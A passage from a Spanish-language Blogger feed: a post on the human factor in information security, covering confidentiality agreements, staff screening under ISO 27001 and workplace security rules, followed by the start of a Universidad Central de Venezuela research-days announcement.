width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-3193855079338336982</id><published>2016-11-15T17:21:00.000-04:00</published><updated>2016-11-18T17:30:57.354-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Ingeniería Social"/><category scheme="http://www.blogger.com/atom/ns#" term="Kevin Mitnick"/><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad de Información"/><title type='text'>La importancia del factor humano en la seguridad</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWAeU1qfOCcS8vx6OSCeNYPBpa64eskf3DVsPSRdDtvyh31m-zvNKzPxqFzoWHjdjZk3jzWWqkbjOcaeHvwpClbTsAcAjnxNWEIg_KgV30mBxuu3DslmxchBe57KiEfu9_3BnAVG_baQo/s1600/La+importancia+del+factor+humano+en+la+seguridad.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;460&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWAeU1qfOCcS8vx6OSCeNYPBpa64eskf3DVsPSRdDtvyh31m-zvNKzPxqFzoWHjdjZk3jzWWqkbjOcaeHvwpClbTsAcAjnxNWEIg_KgV30mBxuu3DslmxchBe57KiEfu9_3BnAVG_baQo/s640/La+importancia+del+factor+humano+en+la+seguridad.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;La implantación de unas adecuadas medidas de seguridad informática exige contemplar aspectos técnicos, organizativos &amp;nbsp;y legales, no obstante, en muchas ocasiones se presta muy poca atención a la importancia del factor humano en la seguridad informática.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Las personas representan el eslabón más débil dentro de la seguridad informática a diferencia de los ordenadores, las personas pueden no seguir las instrucciones exactamente tal y como fueron dictadas, además, pueden llevar a cabo acciones que provoquen un agujero de seguridad en la red de la organización como por ejemplo la instalación de software malicioso en su ordenador, revelación de información sensible a terceros, entre otros.&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Es fundamental, por lo tanto, contemplar el papel de las personas y su relación con los sistemas y redes informáticas de la organización. Además, la disponibilidad en Internet de todo tipo de herramienta y programas, así como la documentación necesaria para su instalación y configuración ha venido a complicar la situación para los responsables de informática de las organizaciones, ya que ahora la &quot;tentación&quot; se encuentra a un simple clic de distancia&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;En definitiva, un principio básico a tener en cuenta desde el punto de vista de la seguridad informática es que todas las soluciones implementadas resulta inútiles ante desconocimiento, más 75% de los problemas inherentes a la seguridad se producen por fallos en la configuración de los equipos o debido a un mal uso por partes del personal de la propia organización.&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Los principales expertos en materia de seguridad informática ya nos han alertado estos últimos años sobre la necesidad de contemplar el factor humano como uno de los más importante y decisivos a la hora de implementar un buen sistema de gestión de seguridad información.&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
En palabras de Kevin Mitnick, uno de los crackers más famosos del mundo por conocidas estafas utilizando Ingeniería Social como principal arma y actual dueño de una consultora de seguridad que lleva su nombre: &quot;Usted puede tener la mejor tecnología, Firewalls, sistemas de detección de ataques, dispositivos biométricos, etc. Lo único que se necesita es un llamado a un empleado desprevenido e ingresar sin más. Tienen todo en sus manos&quot;.&lt;/div&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;El propio experto en criptografía y seguridad Bruce Schneier llegaba a afirmar &quot;si piensas que tecnología puede resolver tus problemas de seguridad, entonces no entiendes el problema y no entiendes la tecnología&quot;.&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size: large; text-align: justify;&quot;&gt;Es por ello, que la implantación de un Sistema de Gestión de Seguridad Informática debe considerar el factor humano como uno de sus elementos claves, contemplando aspectos como:&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;ul&gt;&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;li&gt;Implementación de medidas de seguridad informática.&lt;/li&gt;
&lt;li&gt;Adecuada formación y sensibilización de los empleados.&lt;/li&gt;
&lt;li&gt;Implicación de los responsables y directivos.&lt;/li&gt;
&lt;li&gt;Aprobación de reglamentos internos sobre el uso de herramienta informáticas en la organización.&lt;/li&gt;
&lt;li&gt;Cualquier otra medida de aporte positivo&lt;/li&gt;
&lt;/span&gt;&lt;/ul&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Dentro de las acciones o buenas prácticas a ejecutar se encuentran:&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b&gt;
&lt;/b&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Acuerdos de confidencialidad.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Un acuerdo o contrato de confidencialidad (en inglés non-disclosure agreement o NDA) es un contrato legal entre al menos dos entidades para compartir material confidencial o conocimiento para ciertos propósitos.&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpinPNyzNw6UzEV8RMwYnFk3PI4F4uRtPQbet7elGBvrVfXXY77xGNXRJLeJAmwK-Os4k0K_u44Y2W8GHIRPLmbZzA6UV5g5fGm0rmMybkQtKrZzbw5ESsf1qdBXz-fWLo2A2zAdvXLHw/s1600/non-disclosure+agreement+o+NDA.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpinPNyzNw6UzEV8RMwYnFk3PI4F4uRtPQbet7elGBvrVfXXY77xGNXRJLeJAmwK-Os4k0K_u44Y2W8GHIRPLmbZzA6UV5g5fGm0rmMybkQtKrZzbw5ESsf1qdBXz-fWLo2A2zAdvXLHw/s1600/non-disclosure+agreement+o+NDA.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;ul&gt;&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;li&gt;&lt;b&gt;Inclusión de la seguridad dentro de responsabilidades contractuales.&lt;/b&gt;&lt;/li&gt;
&lt;/span&gt;&lt;/ul&gt;
&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Todos los términos y las condiciones del trabajador tienen que reflejar la política de la empresa además de aclarar los siguientes términos:&lt;/div&gt;
&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;ul&gt;
&lt;li&gt;Todos los empleados, contratistas y terceros a los que se la ha concedido acceso a la información sensible que debe firmar un acuerdo de confidencialidad, ya que no pueden divulgar el acceso a las instalaciones del procesamiento de información.&lt;/li&gt;
&lt;li&gt;Las responsabilidades y los derechos de las subcontratas, por ejemplo en relación con toda la legislación de la protección de datos personales.&lt;/li&gt;
&lt;li&gt;Las responsabilidades de la clasificación de la información y de la gestión de activos que se encuentran asociados a los Sistemas de Gestión de Seguridad de la Información y los servicios que son utilizados por el trabajador o la empresa subcontratada.&lt;/li&gt;
&lt;li&gt;Las responsabilidades de los trabajadores o terceras personas necesarias para maniobrar con la información que reciben las compañías.&lt;/li&gt;
&lt;li&gt;Todas las responsabilidades por parte de la empresa para informar al personal, en la que se incluye información utilizada por el trabajo realizado por la organización.&lt;/li&gt;
&lt;li&gt;Las responsabilidades se extienden fuera de las hipótesis establecidas por la organización y que se encuentran fuera del periodo normal de trabajo.&lt;/li&gt;
&lt;li&gt;Las acciones que se toman si el trabajador o contratista no cumple con todos los requisitos establecidos para la Seguridad de la Información de la organización.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8QbVls8033RewImFYryms0PWQN50dQmfkeMhe-j4wHHXCH9gppQKLQHU4CXA8NfsUq0_LZwTCTdEyWyc8AjDAHINQmKpnsto-c3iXdk76fMV_Ir15Vsu9V0IZ2mZ8uVELfQZLU9AZ2pc/s1600/Inclusi%25C3%25B3n+de+la+seguridad+dentro+de+responsabilidades+contractuales.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8QbVls8033RewImFYryms0PWQN50dQmfkeMhe-j4wHHXCH9gppQKLQHU4CXA8NfsUq0_LZwTCTdEyWyc8AjDAHINQmKpnsto-c3iXdk76fMV_Ir15Vsu9V0IZ2mZ8uVELfQZLU9AZ2pc/s1600/Inclusi%25C3%25B3n+de+la+seguridad+dentro+de+responsabilidades+contractuales.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Selección rigurosa del personal.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Según establece la norma ISO 27001 se tienen que llevar a cabo listas de verificación antes de que estén todos los candidatos para el empleo, los contratistas y terceras personas. Se debe encontrar en concordancia con la legislación vigente y la ética, el listado de verificación debe tener en cuenta la privacidad, la protección de todos los datos del personal y el empleo tiene que estar basado en lo siguiente:&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ol&gt;&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;li&gt;La disponibilidad de referencias satisfactorias sobre todas las actitudes, como por ejemplo, una del personal y otra de la empresa.&lt;/li&gt;
&lt;li&gt;La comprobación del Curriculum Vitae del candidato.&lt;/li&gt;
&lt;li&gt;La confirmación de la certificación académica y profesional.&lt;/li&gt;
&lt;li&gt;La empresa tiene que considerar la realización de una comprobación mucho más detallada a lo largo del tiempo, cuando una persona acceda a un puesto de trabajo, con un contrato inicial, teniendo en cuenta los recursos necesarios para tratar la información y en particular se trata de información sensible, es decir, información financiera.&lt;/li&gt;
&lt;/span&gt;&lt;/ol&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV9_AX2z_EJPRLoOuys_CdKOJlooL0qK7rVwVrTRycQ3956HODRfQnJgKeJC0Kva6BVY9SYIwr2X8mVOxg54Czt7rTBLHsyLM4sHHbHnB5Rl62Z1KdWJiIRAfcjVt-R93faSBxiUDAJSU/s1600/reclutamiento.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;199&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV9_AX2z_EJPRLoOuys_CdKOJlooL0qK7rVwVrTRycQ3956HODRfQnJgKeJC0Kva6BVY9SYIwr2X8mVOxg54Czt7rTBLHsyLM4sHHbHnB5Rl62Z1KdWJiIRAfcjVt-R93faSBxiUDAJSU/s320/reclutamiento.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Las funciones y obligaciones de cada una de las distintas personas que tienen acceso a los datos y a los servicios del sistema de información de una organización deberían estar claramente definidas en todo momento.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Estas medidas afectan a los distintos colectivos que puedan tener acceso a los servicios del sistema y red informática de la organización:&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;ul&gt;
&lt;li&gt;Administradores del sistema y de la red informática&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Desarrolladores de aplicaciones&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Técnicos responsables del mantenimiento de los equipos y de la red informática&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Usuarios finales del sistema&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Directivos&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Personal externo: empresas de servicios que tienen acceso a los recursos informáticos de la organización.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6_UDJ8omgHeA1Me5YYw-1T40z4uPZX7F8z5LQrdVACFmjhJZ-2giSMx7G4erpIwfNBGIP7qoUf9WglQTlhKN3jwtZiV2VjSkB_DRI9tPHPkNh4dPiORV7TpzfDtrx5kYcmLQ4eGntDpg/s1600/servicios+del+sistema.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;240&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6_UDJ8omgHeA1Me5YYw-1T40z4uPZX7F8z5LQrdVACFmjhJZ-2giSMx7G4erpIwfNBGIP7qoUf9WglQTlhKN3jwtZiV2VjSkB_DRI9tPHPkNh4dPiORV7TpzfDtrx5kYcmLQ4eGntDpg/s320/servicios+del+sistema.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Normas prácticas:&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;ul&gt;&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;li&gt;Cada equipo asignado a un puesto de trabajo estará bajo la responsabilidad de uno de los usuarios autorizados en el sistema informático de la organización.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Antes de abandonar el equipo del puesto de trabajo, ya sea temporalmente o bien al finalizar su turno de trabajo, deberá cancelar todas las sesiones activas y conexiones con los servidores de la red corporativa.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Utilizar un protector de pantallas protegido con contraseña. Bloquear la máquina al alejarse de ella.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Impedir que otros usuarios puedan utilizar su identidad para acceder al sistema informático.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;No introducir CD-ROMs, USB u otros medios sin la comprobación previa de que no contienen riesgos de ninguna clase.&lt;/li&gt;
&lt;li&gt;No se cambiará la configuración del equipo ni se intentará solucionar posibles problemas de funcionamiento. En dicho caso, se deberá comunicar inmediatamente a la persona encargada del mantenimiento de los equipos.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Sólo se utilizarán las herramientas corporativas , quedando prohibida la instalación de cualquier software en las computadoras de la empresa que no haya sido expresamente autorizado.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Discos y documentos con información sensible deberán guardarse bajo llave.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;En el caso de impresoras, asegurarse que no queden documentos impresos en la bandeja de salida que contengan datos protegidos u otra información sensible.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Deberá informarse de cualquier incidencia que pudiera afectar a la seguridad de la red informática o al normal funcionamiento del sistema.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Los equipos y medios informáticos de la organización no pueden ser sacados fuera de ésta sin la correspondiente autorización de los responsables.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Se limitará el acceso a Internet solamente a fines profesionales&amp;nbsp;&lt;/li&gt;
&lt;/span&gt;&lt;/ul&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF0D_zrqHx8U9fIZ6zOPPgaokxneJzmLI_rkN8vGqwPMOseg5bD7TyZWVOGgy5YXwhTnUyIH9w0YtuW3ktcFhe3RvX0kTVcCBkhxwSohDUOBfuDMtLST5Ehq2cyCblMexe_rmtMciI81c/s1600/reporte-seguridad-informatica-fdg2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF0D_zrqHx8U9fIZ6zOPPgaokxneJzmLI_rkN8vGqwPMOseg5bD7TyZWVOGgy5YXwhTnUyIH9w0YtuW3ktcFhe3RvX0kTVcCBkhxwSohDUOBfuDMtLST5Ehq2cyCblMexe_rmtMciI81c/s320/reporte-seguridad-informatica-fdg2.jpg&quot; width=&quot;302&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b style=&quot;text-align: justify;&quot;&gt;Uso adecuado de correos electrónicos&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;La forma de asegurarse que el intercambio de información se lleva a cabo adecuadamente y bajo la protección necesaria, es a través de la elaboración de una política que incluya los medios empleados en esta actividad. En dicha política se debe incorporar:&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;li&gt;Los procedimientos definidos para gestionar correctamente los medios utilizados.&lt;/li&gt;
&lt;li&gt;Utilización de firma electrónica.&lt;/li&gt;
&lt;li&gt;Comprobaciones a través de controles que impidan modificaciones, interpretaciones, duplicados o eliminación de información.&lt;/li&gt;
&lt;li&gt;Inspecciones de protección contra el código malicioso.&lt;/li&gt;
&lt;li&gt;Metodologías de ingeniería social.&lt;/li&gt;
&lt;/span&gt;&lt;/ul&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6itnkbVlJoE1xCbkDSkkid9U-JG085G7tbnmmf0DS3BF1DoVHcCerLETEVJC1uX4x9kToViuE4Nix0Zs_S2XSywDqJOdTGMXrsjnZBTB2g5JclT0C1c73fR7fabByzDByVw98zILRJsA/s1600/correo+electronico.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;151&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6itnkbVlJoE1xCbkDSkkid9U-JG085G7tbnmmf0DS3BF1DoVHcCerLETEVJC1uX4x9kToViuE4Nix0Zs_S2XSywDqJOdTGMXrsjnZBTB2g5JclT0C1c73fR7fabByzDByVw98zILRJsA/s320/correo+electronico.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;
&lt;div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/3193855079338336982/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2016/11/la-importancia-del-factor-humano-en-la.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/3193855079338336982'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/3193855079338336982'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2016/11/la-importancia-del-factor-humano-en-la.html' title='La importancia del factor humano en la seguridad'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWAeU1qfOCcS8vx6OSCeNYPBpa64eskf3DVsPSRdDtvyh31m-zvNKzPxqFzoWHjdjZk3jzWWqkbjOcaeHvwpClbTsAcAjnxNWEIg_KgV30mBxuu3DslmxchBe57KiEfu9_3BnAVG_baQo/s72-c/La+importancia+del+factor+humano+en+la+seguridad.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-6733464166826650787</id><published>2016-11-14T17:19:00.002-04:00</published><updated>2016-11-14T17:21:16.722-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Investigación"/><category scheme="http://www.blogger.com/atom/ns#" term="Jornadas"/><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad de Información"/><category scheme="http://www.blogger.com/atom/ns#" term="UCV"/><title type='text'>Jornadas de Investigación Ing. UCV - 14 al 18 de Nov.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzzwCzq70QTBcRDuCMQPTgwoUx1gBxUuoHs2Pe077Q_9Rz3D8mcYz8NDZXqN5-EftFSGxoN0l7e9-rvrdMo-qreY4cY4wiF9wJdgAPmEscxYVR1oIjj70UVkC99oNMsIJpCGVJENkJXWk/s1600/jifi-2016.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzzwCzq70QTBcRDuCMQPTgwoUx1gBxUuoHs2Pe077Q_9Rz3D8mcYz8NDZXqN5-EftFSGxoN0l7e9-rvrdMo-qreY4cY4wiF9wJdgAPmEscxYVR1oIjj70UVkC99oNMsIJpCGVJENkJXWk/s1600/jifi-2016.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;La Facultad de Ingeniería de la Universidad Central de Venezuela, comprometida con el desarrollo científico y tecnológico del país, invita a participar en las Jornadas de Investigación y en el Encuentro Académico e Industrial JIFI-EAI 2016.&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;JIFI-EAI ha sido reconocido como un escenario multidisciplinario para impulsar la difusión y transferencia del conocimiento tecnológico, científico y humanístico, en el área de ingeniería y sus afines. De igual manera, constituye un espacio dialógico para intercambiar experiencias tanto de los organismos del Estado como del sector privado en relación con los productos y logros de las principales disciplinas de la ingeniería, búsqueda de soluciones a la diversidad de problemas nacionales en las áreas de su competencia y desarrollo de estrategias para la formación del ser humano.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;http://jifi-eai.ing.ucv.ve/&quot;&gt;http://jifi-eai.ing.ucv.ve&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
